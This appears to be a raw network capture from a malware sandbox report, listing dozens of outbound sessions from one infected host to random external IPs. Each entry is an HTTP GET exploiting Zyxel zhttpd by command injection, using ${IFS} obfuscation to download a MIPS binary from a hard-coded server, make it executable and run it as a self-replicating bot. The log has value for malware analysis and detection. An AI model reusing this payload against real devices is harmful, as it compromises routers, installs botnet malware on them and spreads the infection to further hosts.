                                                  Jan 19, 2024 18:24:14.420527935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8846192.168.2.1338788150.74.19.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420566082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8847192.168.2.1360956220.51.165.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420598984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8848192.168.2.13426921.123.190.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420628071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8849192.168.2.1350660100.248.143.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420682907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8850192.168.2.1340562154.207.123.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420720100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8851192.168.2.1352298137.64.85.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420766115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8852192.168.2.133872251.32.21.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420785904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8853192.168.2.1337132130.173.65.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420815945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8854192.168.2.1337778160.236.66.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420861006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8855192.168.2.1333796216.219.77.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420902967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8856192.168.2.134804435.218.118.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420943022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8857192.168.2.1354380124.221.242.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421005011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8858192.168.2.134631446.230.188.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421045065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8859192.168.2.134677065.118.254.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421092987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8860192.168.2.1340178145.213.85.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421129942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8861192.168.2.1339656199.186.44.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421156883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8862192.168.2.135934875.162.205.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421212912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8863192.168.2.1339630216.176.148.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421264887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8864192.168.2.133750697.149.104.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421294928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8865192.168.2.1337922102.162.248.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421344042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8866192.168.2.1333776176.178.231.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421396971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8867192.168.2.1336238104.113.139.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421428919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8868192.168.2.135187274.100.83.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421464920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8869192.168.2.134781290.96.44.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421495914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8870192.168.2.1352372149.223.75.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421540022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8871192.168.2.133879697.1.21.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421583891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8872192.168.2.1353370168.174.196.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421619892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8873192.168.2.1338292160.64.68.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421675920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8874192.168.2.133967092.68.209.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421713114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8875192.168.2.1352558146.109.175.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421715975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8876192.168.2.135853065.145.185.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421802998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8877192.168.2.1342374106.182.220.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421834946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8878192.168.2.1343730177.171.157.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421879053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8879192.168.2.133314469.22.127.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421920061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8880192.168.2.134032895.55.192.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421946049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8881192.168.2.135340632.173.46.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.421962976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8882192.168.2.133418618.131.16.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422008038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8883192.168.2.135272089.111.29.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422045946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8884192.168.2.1338060205.26.189.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422090054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8885192.168.2.136038082.76.141.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422133923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8886192.168.2.13540781.118.54.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422185898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8887192.168.2.135425478.215.230.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422234058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8888192.168.2.133949890.137.14.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422272921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8889192.168.2.1334102132.18.11.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422307968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8890192.168.2.1345928151.49.32.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422355890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8891192.168.2.1333904119.148.238.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422410011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8892192.168.2.1351378210.49.215.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422435999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8893192.168.2.135944439.195.2.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422471046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8894192.168.2.1359552193.18.94.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422534943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8895192.168.2.133608699.157.38.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422580957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8896192.168.2.1347100202.190.110.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422620058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8897192.168.2.1347366162.15.72.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422657013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8898192.168.2.1350182163.57.3.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422694921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8899192.168.2.1337616128.106.82.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422740936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8900192.168.2.1345866137.209.217.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422782898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8901192.168.2.1358170201.240.129.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422826052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8902192.168.2.1347220106.212.11.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422874928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8903192.168.2.1344942212.213.226.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422914028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8904192.168.2.135080293.242.173.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.422966957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8905192.168.2.134207036.64.26.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423012018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8906192.168.2.1353000179.35.225.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423049927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8907192.168.2.1346434118.35.135.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423079014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8908192.168.2.1340440184.0.11.136443
                                                  TimestampBytes transferredDirectionData
